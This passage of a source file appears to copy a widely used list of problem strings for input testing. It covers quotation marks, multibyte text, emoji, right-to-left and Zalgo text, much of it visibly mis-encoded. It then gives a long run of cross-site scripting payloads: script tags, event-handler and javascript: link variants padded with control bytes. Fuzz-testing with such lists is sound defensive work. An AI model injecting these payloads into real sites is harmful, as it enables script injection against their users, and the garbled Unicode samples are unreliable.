"ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ" + "¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + + // Quotation Marks + // + // Strings which contain misplaced quotation marks; can cause encoding errors + + "'", "\"", "''", "\"\"", "'\"'", "\"''''\"'\"", "\"'\"'\"''''\"", "<foo val=¬タワbar¬タン />", "<foo val=¬タワbar¬タン />", "<foo val=¬タンbar¬タワ />", + "<foo val=`bar' />", + + // Two-Byte Characters + // + // Strings which contain two-byte characters: can cause rendering issues or character-length issues + + "ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", " ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", + "¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", "←テᄄ│ミᄑ₩ᅠᄐ", "↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", + "↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ " + "→リᅠ→ᄚᄅ↑ᄚチ■ユリ", + "ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", "↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", + "ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + + // Changing length when lowercased + // + // Characters which increase in length (2 to 3 bytes) when lowercased + // Credit: https://twitter.com/jifa/status/625776454479970304 + + "ᄎ", "ᄒ", + + // Japanese Emoticons + // + // Strings which consists of Japanese-style emoticons which are popular on the web + + " ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", + "(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", "ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", "__ᄒロ(,_,*)", + " ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", + "ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", + ", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", + "(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", + "(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", "¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", "( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + + // Emoji + // + // Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + + "゚リヘ", "゚ムᄅ゚マᄑ", "゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", + "゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", + "¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ " + "゚メル", + "¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", + "゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", + "0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ " + "゚ヤ゚", + + // Regional Indicator Symbols + // + // Regional Indicator Symbols can be displayed differently across + // fonts, and have a number of special behaviors + + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", + "゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + + // Unicode Numbers + // + // Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + + "ᄐムᄐメᄐモ", "ᄀᄁᆪ", + + // Right-To-Left Strings + // + // Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + + "ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ " + "ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ " + "ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ " + "ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ " + "ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", + "ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", + "ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", "ᄋᄑ", + "ᄋᄎ", + "ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ " + "ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ " + "ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ " + "ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + + // Trick Unicode + // + // Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + + "¬タᆰ¬タᆰtest¬タᆰ", "¬タᆱtest¬タᆱ", "¬タᄅtest¬タᄅ", "test¬チᅠtest¬タᆱ", "¬チᆭtest¬チᄃ", + + // Zalgo Text + // + // Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + + "£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ " + "ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ " + "ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ " + "ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", + "ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ " + "ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ " + "ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ." + "ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", + "ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ " + "ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ " + "ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf " + "ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", + "ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ " + "ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ " + "ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", + "Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + + // Unicode Upsidedown + // + // Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + + "ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン " + "ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ " + "ᆵᅦンᄍoᅨᆬ", + "00ᅨルᅥヨ$-", + + // Unicode font + // + // Strings which contain bold/italic/etc. versions of normal characters + + "ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ " + "ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", + "ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ " + "ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ " + "ンミンンミᄄンミᅠ", + "ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ " + "ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ " + "ンヨノンヨヤンヨフ", + "ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ " + "ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ " + "ンメナンメミンメネ", + "ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ " + "ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ " + "ンモᆳンモᄌンモᄚ", + "ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ " + "ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ " + "ンユユンユᅠンユリ", + "ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ " + "ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ " + "ンレヘンレリンレミ", + "¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ " + "¬メ゚¬メᆰ¬メᄁ", + + // Script Injection + // + // Strings which attempt to invoke a benign script injection; shows vulnerability to XSS + + "<script>alert(123)</script>", "<script>alert('123');</script>", "<img src=x onerror=alert(123) />", + "<svg><script>123<1>alert(123)</script>", "\"><script>alert(123)</script>", "'><script>alert(123)</script>", "><script>alert(123)</script>", + "</script><script>alert(123)</script>", "< / script >< script >alert(123)< / script >", " onfocus=JaVaSCript:alert(123) autofocus", + "\" onfocus=JaVaSCript:alert(123) autofocus", "' onfocus=JaVaSCript:alert(123) autofocus", "ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", + "<sc<script>ript>alert(123)</sc</script>ript>", "--><script>alert(123)</script>", "\";alert(123);t=\"", "';alert(123);t='", "JavaSCript:alert(123)", + ";alert(123);", "src=JaVaSCript:prompt(132)", "\"><script>alert(123);</script x=\"", "'><script>alert(123);</script x='", "><script>alert(123);</script x=", + "\" autofocus onkeyup=\"javascript:alert(123)", "' autofocus onkeyup='javascript:alert(123)", + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", "'`\"><\\x3Cscript>javascript:alert(1)</script>", + "'`\"><\\x00script>javascript:alert(1)</script>", "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", + "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", + "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", + "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", + "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", + "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", "\"`'><script>\\x3Bjavascript:alert(1)</script>", "\"`'><script>\\x0Djavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", + "\"`'><script>\\x09javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", + "\"`'><script>\\x00javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", + "\"`'><script>\\x0Cjavascript:alert(1)</script>", "\"`'><script>\\x2Bjavascript:alert(1)</script>", + "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", "\"`'><script>-javascript:alert(1)</script>", + "\"`'><script>\\x0Ajavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", + "\"`'><script>\\x7Ejavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", + "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", + "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", + "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", + "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", 